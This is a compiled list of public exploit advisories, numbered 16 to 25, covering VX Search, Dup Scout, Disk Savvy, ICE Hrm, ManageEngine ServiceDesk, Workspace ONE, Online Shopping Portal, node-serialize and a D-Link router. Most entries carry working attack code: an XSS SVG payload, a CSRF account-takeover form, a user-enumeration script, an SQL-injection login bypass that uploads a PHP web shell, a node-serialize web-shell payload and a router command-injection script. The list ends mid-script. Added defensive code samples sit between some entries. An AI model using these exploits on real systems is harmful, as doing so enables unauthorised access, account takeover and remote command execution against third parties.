16. # Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.vxsearch.com
# Software Links:
# https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe
# https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe
# Tested Version: 13.5.28
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

VX Search Server        VX Search Server        C:\Program Files\VX Search Server\bin\vxsrchs.exe        Auto
VX Search Enterprise    VX Search Enterprise    C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe    Auto

C:\>sc qc "VX Search Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VX Search Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\VX Search Server\bin\vxsrchs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VX Search Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>sc qc "VX Search Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VX Search Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VX Search Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
17. # Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.dupscout.com
# Software Links:
# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe
# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe
# Tested Version: 13.5.28
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Dup Scout Server        Dup Scout Server        C:\Program Files\Dup Scout Server\bin\dupscts.exe        Auto
Dup Scout Enterprise    Dup Scout Enterprise    C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe    Auto

C:\>sc qc "Dup Scout Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Dup Scout Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Dup Scout Server\bin\dupscts.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Dup Scout Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>sc qc "Dup Scout Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Dup Scout Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Dup Scout Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
18. # Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.disksavvy.com
# Software Links:
# https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe
# https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe
# Tested Version: 13.6.14
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Savvy Server        Disk Savvy Server        C:\Program Files\Disk Savvy Server\bin\disksvs.exe        Auto
Disk Savvy Enterprise    Disk Savvy Enterprise    C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe    Auto

C:\>sc qc "Disk Savvy Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Savvy Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Server\bin\disksvs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Savvy Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Savvy Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Savvy Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
19. # Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
# Exploit Author: Piyush Patil & Rafal Lykowski
# Vendor Homepage: https://icehrm.com/
# Version: 29.0.0.OS
# Tested on: Windows 10 and Kali

# Description
The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.

# Steps to Reproduce the issue:
1- Login to ICE Hrm Admin Panel
2- Click on Employees => Document Management => Upload the xml file below

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>

3- Visit the upload location of the file and the XSS will be triggered.

# Video POC: https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing
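The upload in the post above is accepted because the application stores whatever XML it is given and later serves it inline, where the browser renders it as SVG and runs the embedded script. The following is an added example, not part of the advisory and not ICE Hrm code: a server-side gate that parses an uploaded SVG/XML document and rejects the constructs that carry script (script and foreignObject elements, on* event-handler attributes, href/xlink:href values with a javascript: or data: scheme, and any DOCTYPE/ENTITY declaration, which is rejected here as a matter of policy against XXE-style payloads). The three documents are constructed for the example; the first reproduces the post's payload.

```python
"""Reject SVG uploads that can execute script. Added example; the SVG samples are constructed."""
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample 1: the post's payload, an SVG carrying a <script> element.
MALICIOUS_SVG = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">alert("XSS");</script>
</svg>'''

# Constructed sample 2: no <script>, but an event handler and a javascript: link.
HANDLER_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="10" height="10" onload="alert(1)"/>
  <a xlink:href="javascript:alert(2)"><text x="0" y="10">click</text></a>
</svg>'''

# Constructed sample 3: a plain drawing that should pass.
BENIGN_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="blue"/>
</svg>'''

# Elements that run script or embed arbitrary HTML when an SVG is rendered inline.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Attributes whose value is a URL (including animation targets that can set href).
URL_ATTRIBUTES = {"href", "src", "from", "to", "values"}
SCRIPT_SCHEMES = ("javascript:", "data:")


def _local(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> List[str]:
    """Every reason the document must not be stored and served as an image."""
    findings: List[str] = []
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        findings.append("DOCTYPE/ENTITY declaration present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr)
            # Whitespace inside the scheme is stripped so "java script:" is not a bypass.
            scheme_probe = value.strip().lower().replace(" ", "").replace("\t", "")
            if name.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name in URL_ATTRIBUTES and scheme_probe.startswith(SCRIPT_SCHEMES):
                findings.append(f"{name} on <{tag}> uses a script-capable URL scheme")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


if __name__ == "__main__":
    for label, doc in (("post payload", MALICIOUS_SVG), ("handler", HANDLER_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", "accept" if is_safe_svg(doc) else svg_findings(doc))
```

Even an accepted SVG should be served with `Content-Disposition: attachment` (or from a separate origin) and a Content-Security-Policy without `unsafe-inline`; the parser check above reduces what gets stored, it does not replace how the file is served.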
20. # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
    parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
    parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')
    parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
    my_args = parser.parse_args()
    return my_args


def main():
    args = get_args()
    url = args.target
    domain = args.domain
    usersfile = args.usersfile
    outputfile = args.outputfile

    s = requests.session()
    s.get(url)
    # Baseline: the ForgotPassword response for a username that certainly does not exist
    resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify=False)
    incorrect_size = len(resp_incorrect.content)
    print("Incorrect size: %s"%(incorrect_size))

    correct_users = []
    users = open(usersfile).read().splitlines()
    for u in users:
        resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify=False)
        # A response of a different size than the baseline means the account exists
        valid = (len(resp.content) != incorrect_size)
        if valid:
            correct_users.append(u)
        print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content), str(valid)))

    print("\nCorrect users\n")
    with open(outputfile, 'w') as f:
        for user in correct_users:
            f.write("%s\n" % user)
            print("- %s"%(user))
    print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()
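The script above needs nothing more than a response-length oracle: the password-reset page says something different for existing and non-existing accounts. The example below, added for this page and not ManageEngine's or the exploit author's code, models that endpoint twice in a few lines (the vulnerable shape and one that answers identically in both cases) and reuses the exploit's baseline-comparison idea as a local test harness. The user store, the handler names and the response wording are constructed for the example.

```python
"""Response-size oracle in a forgot-password handler, and the hardened form (added example)."""
import random

# Constructed user directory; the real product consults a directory service.
USERS = {"administrator", "jdoe", "helpdesk"}
SENT = []   # records which accounts would have received a reset mail


def _queue_reset_mail(username, domain):
    SENT.append("%s@%s" % (username, domain))


def vulnerable_forgot_password(username, domain):
    """Reveals account existence: the two branches return different pages."""
    if username in USERS:
        _queue_reset_mail(username, domain)
        return "<html>An email with reset instructions was sent to %s@%s</html>" % (username, domain)
    return "<html>The user does not exist in the domain</html>"


def hardened_forgot_password(username, domain):
    """Same response for every input; only the side effect differs.

    Nothing in the body, its length or its wording depends on the lookup. A
    complete fix also keeps the timing equal (for example, by doing the same
    directory work on both branches), which this example does not measure.
    """
    if username in USERS:
        _queue_reset_mail(username, domain)
    return "<html>If the account exists, an email with reset instructions has been sent.</html>"


def measure(handler, candidates, domain="CORP"):
    """Replay the exploit's logic locally: names whose response size differs from a known-bad one."""
    # A random name that cannot be a real account gives the baseline.
    baseline = len(handler("nonexistent-%08x" % random.getrandbits(32), domain))
    return sorted(u for u in candidates if len(handler(u, domain)) != baseline)


if __name__ == "__main__":
    wordlist = ["jdoe", "nobody", "administrator", "mallory"]
    print("vulnerable:", measure(vulnerable_forgot_password, wordlist))
    print("hardened:  ", measure(hardened_forgot_password, wordlist))
```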
21. # Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 06-16-2021
# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
# Software Links : https://getwsone.com/
# Tested Version: 20.3.8.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

VMware Hub Health Monitoring Service  VMware Hub Health Monitoring Service  C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe  Auto

C:\>sc qc "VMware Hub Health Monitoring Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VMware Hub Health Monitoring Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VMware Hub Health Monitoring Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
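The wmic and sc output above shows the condition (auto-start, LocalSystem, unquoted path with spaces) but not what an attacker actually has to be able to write. The example below, added for this page and not the vendor's or the finder's code, applies the CreateProcess rule for an unquoted command line (at every space the prefix is tried as a program, with .exe appended) to compute the planting locations, and filters a list of service records the way the advisory's findstr chain does. The service list is constructed from the advisory plus two made-up control entries; the function names are the example's own.

```python
"""Hijack candidates for unquoted service paths (added example, not vendor code)."""
import ntpath
import re

# Constructed records in the shape `sc qc` reports them: the advisory's service
# plus a properly quoted one and a Windows one with no space before the image.
SERVICES = [
    {"name": "VMware Hub Health Monitoring Service",
     "path": r"C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe",
     "start_mode": "Auto", "start_name": "LocalSystem"},
    {"name": "QuotedSvc",                                    # constructed control
     "path": r'"C:\Program Files\Some Vendor\svc.exe" -service',
     "start_mode": "Auto", "start_name": "LocalSystem"},
    {"name": "wuauserv",                                     # constructed control
     "path": r"C:\Windows\system32\svchost.exe -k netsvcs",
     "start_mode": "Auto", "start_name": "LocalSystem"},
]

# The image path ends at the first ".exe" that is followed by whitespace or the end;
# anything after it is service arguments, not part of the program name.
_IMAGE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


def hijack_candidates(path_name):
    """Executables Windows would try, in order, before reaching the real binary."""
    if path_name.startswith('"'):
        return []                       # quoted: the service is not affected
    m = _IMAGE_RE.match(path_name)
    image = m.group(1) if m else path_name
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def planting_directories(path_name):
    """Directories an attacker needs write access to; check each with icacls on the host."""
    return sorted({ntpath.dirname(c) for c in hijack_candidates(path_name)})


def exposed_services(services):
    """(name, account, candidates) for auto-start services with an unquoted, space-containing path."""
    out = []
    for svc in services:
        cands = hijack_candidates(svc["path"])
        if cands and svc["start_mode"].lower() == "auto":
            out.append((svc["name"], svc["start_name"], cands))
    return out


if __name__ == "__main__":
    for name, account, cands in exposed_services(SERVICES):
        print(name, "runs as", account)
        for c in cands:
            print("   would load:", c, "(directory:", ntpath.dirname(c) + ")")
```

For the path in this advisory both candidates land in C:\, which standard users cannot write to on a default install; the finding becomes exploitable only where C:\ or a deeper component of the path has weak ACLs, so the planting directories are what to check next.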
22. # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)
# Exploit Author: Piyush Patil & Rafal Lykowski
# Vendor Homepage: https://icehrm.com/
# Version: 29.0.0.OS
# Tested on: Windows 10 and Kali

# Description
ICE Hrm Version 29.0.0.OS is vulnerable to CSRF, which allows an attacker to add a new admin account or change the password, leading to full account takeover.

# Steps to reproduce the attack:
1- Login as victim
2- Open the CSRF malicious file which I have attached (csrf_POC.html)

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8070/app/service.php">
      <input type="hidden" name="t" value="User" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="changePassword" />
      <input type="hidden" name="mod" value="admin&#61;users" />
      <input type="hidden" name="req" value="&#123;&quot;id&quot;&#58;1&#44;&quot;pwd&quot;&#58;&quot;Hacker123&#35;&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3- Password is changed (you can also add a new admin user)

Now you can simply take over the account

# Video POC: https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing
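Two details of the PoC above matter for the fix: the form has no method attribute, so the password change rides on a plain GET, and the JSON in req is accepted with nothing that ties the request to the victim's session. The check below is an added example for this page, not ICE Hrm code: it refuses state changes that are not POST, uses the browser's Sec-Fetch-Site and Origin/Referer headers when present, and requires a per-session token derived with HMAC from a server secret. The site origin, the secret, the header dictionaries and the function names are the example's assumptions; the form fields are the PoC's.

```python
"""Server-side CSRF check for a state-changing request (added example, not ICE Hrm code)."""
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "https://hr.example"                            # assumption: where the app is served
SERVER_SECRET = b"constructed-secret-rotate-in-production"    # assumption: kept server-side only


def csrf_token(session_id):
    """Per-session token: recomputed on every check, so nothing has to be stored."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(url):
    p = urlsplit(url)
    return "%s://%s" % (p.scheme, p.netloc) if p.scheme and p.netloc else None


def check_state_change(method, headers, form, session_id):
    """Return None if the request may modify state, otherwise the reason to refuse it."""
    if method.upper() != "POST":
        return "state change requested with " + method.upper()   # the PoC form submits a GET
    # Browsers that support Fetch Metadata label cross-site form posts for us.
    sfs = headers.get("Sec-Fetch-Site")
    if sfs is not None and sfs not in ("same-origin", "none"):
        return "cross-site request (Sec-Fetch-Site=%s)" % sfs
    # Older browsers: fall back to Origin, then Referer; both must name our site.
    origin = _origin_of(headers.get("Origin") or headers.get("Referer") or "")
    if origin != SITE_ORIGIN:
        return "missing or foreign Origin/Referer: %r" % origin
    # Finally the token, compared in constant time.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return "missing or invalid CSRF token"
    return None


# The PoC's fields, decoded, as the application would receive them.
POC_FORM = {"t": "User", "a": "ca", "sa": "changePassword", "mod": "admin=users",
            "req": '{"id":1,"pwd":"Hacker123#"}'}
# Constructed headers for a victim who opened csrf_POC.html on an attacker page.
POC_HEADERS = {"Referer": "https://attacker.example/", "Sec-Fetch-Site": "cross-site"}

if __name__ == "__main__":
    print("PoC as-is:      ", check_state_change("GET", POC_HEADERS, POC_FORM, "sess1"))
    print("PoC forced POST:", check_state_change("POST", POC_HEADERS, POC_FORM, "sess1"))
    legit = dict(POC_FORM, csrf_token=csrf_token("sess1"))
    print("legitimate:     ", check_state_change("POST", {"Origin": SITE_ORIGIN}, legit, "sess1"))
```

A SameSite=Lax session cookie would not stop this particular PoC on its own: Lax still sends the cookie on top-level GET navigations, which is exactly what an unmethoded form submission is. Rejecting GET for state changes is what closes that path; the token closes the POST variant.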
23. # Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
# Date: 17.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: V3.1
# Tested on: Windows & Ubuntu

import requests
import random
import string

url = "http://192.168.1.3:80/shopping"
# Minimal PHP web shell: runs ?cmd=... with system() and prints the output
payload = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

session = requests.session()

# Step 1: SQL injection in the admin login form bypasses authentication
print("logging in")
request_url = url+"/admin/"
post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}
session.post(request_url, data=post_data)

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))
print("product name is "+randstr)
print("shell name is "+shellname)

# Step 2: insert-product.php stores the product images without checking the file type,
# so the .php shell is written to admin/productimages/
print("uploading payload")
request_url = url+"/admin/insert-product.php"
boundary = "----WebKitFormBoundaryJNYN304wDTnp1QmE"
post_header = {
    "Cache-Control": "max-age=0",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "multipart/form-data; boundary="+boundary,
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Referer": url+"/admin/insert-product.php",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close"
}


def field(name, value):
    return "--"+boundary+"\r\nContent-Disposition: form-data; name=\""+name+"\"\r\n\r\n"+value+"\r\n"


def file_field(name, filename, content):
    return ("--"+boundary+"\r\nContent-Disposition: form-data; name=\""+name+"\"; filename=\""+filename+"\"\r\n"
            "Content-Type: application/octet-stream\r\n\r\n"+content+"\r\n")


post_data = (
    field("category", "80") +
    field("subcategory", "8080") +
    field("productName", randstr) +
    field("productCompany", "Tagoletta") +
    field("productpricebd", "Tagoletta") +
    field("productprice", "Tagoletta") +
    field("productDescription", "Tagoletta") +
    field("productShippingcharge", "Tagoletta") +
    field("productAvailability", "In Stock") +
    file_field("productimage1", shellname+".php", payload) +
    file_field("productimage2", shellname+".php", payload) +
    file_field("productimage3", shellname+".php", payload) +
    field("submit", "") +
    "--"+boundary+"--\r\n"
)
session.post(request_url, headers=post_header, data=post_data)

# Step 3: search for the new product; the result page links the image, which reveals the shell path
request_url = url+"/search-result.php"
post_data = {"product": randstr, "search": ''}
shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0]
print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")
24. # Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3)
# Date: 17.06.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://github.com/luin/serialize
# Software Link: https://github.com/luin/serialize
# Version: 0.0.4
# Tested on: Windows & Ubuntu
# CVE : 2017-5941

var serialize = require('node-serialize');

// A string value starting with _$$ND_FUNC$$_ is treated as serialized function
// source and eval()'d by unserialize(); the trailing "()" makes it run at once.
// Here it starts an HTTP server on port 443 that executes ?cmd=... via child_process.exec.
var payload = {
  "webShell": "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()"
}

serialize.unserialize(serialize.serialize(payload))

/*
# after being exploited
┌──(root@kali)-[/home/kali]
└─# curl http://10.0.2.4:443?cmd=whoami
nodeadmin
*/
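What unserialize() acts on is ordinary JSON in which any string beginning with _$$ND_FUNC$$_ is eval()'d; the immediate-invocation suffix in the post is what turns deserialisation into execution. A detector for that format is something a WAF rule or a log-review script can apply to inbound serialized data before the application sees it. The example below is added for this page, not node-serialize's code or the exploit author's: it walks nested JSON, reports every function-flagged string with its path, and marks the immediately invoked ones. The sample payloads are constructed (the first is a shortened form of the post's web shell).

```python
"""Find eval()-able function strings in a node-serialize payload (added example)."""
import json
import re

FUNC_FLAG = "_$$ND_FUNC$$_"                           # node-serialize's marker for a serialized function
_IIFE_TAIL = re.compile(r"\}\s*\(\s*\)\s*;?\s*$")     # "}()" at the end: executed during unserialize()


def find_serialized_functions(blob):
    """Return one finding per flagged string: JSON path, whether it is immediately invoked, source prefix.

    A flagged string is eval()'d by unserialize() whether or not it is invoked;
    the invoked ones are the RCE-on-deserialize case, the others become live
    function objects the application might call later.
    """
    try:
        doc = json.loads(blob)
    except ValueError:
        return []
    findings = []

    def walk(node, path):
        if isinstance(node, str):
            if node.startswith(FUNC_FLAG):
                src = node[len(FUNC_FLAG):]
                findings.append({"path": path,
                                 "invoked": bool(_IIFE_TAIL.search(src)),
                                 "source": src[:60]})
        elif isinstance(node, dict):
            for key, value in node.items():
                walk(value, "%s.%s" % (path, key))
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, "%s[%d]" % (path, i))

    walk(doc, "$")
    return findings


# Constructed samples: a shortened version of the post's web shell, and a function
# buried in a nested structure that is defined but not invoked.
POST_PAYLOAD = json.dumps({
    "webShell": "_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"
})
NESTED = json.dumps({"profile": {"name": "bob", "hooks": ["_$$ND_FUNC$$_function(){ return 1 }"]}})

if __name__ == "__main__":
    for label, blob in (("post", POST_PAYLOAD), ("nested", NESTED), ("benign", '{"a": 1}')):
        print(label, find_serialized_functions(blob))
```

Because the marker is matched on the raw string, the same check must run after any outer encoding is removed (a base64 cookie value, for instance); a blocklist on the marker is a detection aid, and the real fix is to never hand untrusted input to node-serialize's unserialize().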
25. # Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
# Date: 17-06-2021
# Exploit Author: Mohammed Hadi (HadiMed)
# Vendor Homepage: https://me.dlink.com/consumer
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09
# Version: ME_1.16
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)

###
#!/bin/bash
# Exploit by HadiMed
# Takes advantage of the tftp server that accepts the cfg file blindly

echo -ne "\n"
echo "Exploiting Dlink DSL-2750u version 1.6"
echo -ne "\n\n"

# Sending the payload
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
echo -ne "\n"
echo "File uploaded Successfully"
echo "Waiting for router to restart"
sleep 180   # approximate time for router to restart
python3 exploit.py
###

import requests

# HTTP request looks like this
'''
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.1.1
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/cgi-bin/webproc
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
Connection: close

getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91
'''

# 1 Getting a session id
# password and username crafted by me in the cfg.xml file
username = "pwned"
password = "pwned"
# actually the client sets the sessionid on condition that the password and username are correct
Cookie = "sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
Contentty = "application/x-www-form-urlencoded"
Referer = "http://192.168.1.1/cgi-bin/webproc"
Contentlen = "175"

# Sending first request to set our session id
response = requests.post("http://192.168.1.1/cgi-bin/webproc",
                         headers={"Cookie": Cookie, "Content-Type": Contentty, "Referer": Referer, "Content-Length": Contentlen},
                         data={
                             "getpage": "html/index.html",
                             "errorpage": "html/main.html",
                             "var:menu": "setup",
                             "var:page": "wizard",
                             "obj-action": "auth",
                             ":username": username,
                             ":password": password,
                             ":action": "login",
                             ":sessionid": "deadbeef"
                         })

Referer = "http://192.168.1.1/cgi-bin/webupg"
name = "mac"
# The "newmac" value reaches a shell unsanitised; ${IFS} stands in for a space
cmd = "1;sleep${IFS}10;reboot;"
Contentlen = str(len(name+cmd)+10)

if response.status_code == 302:
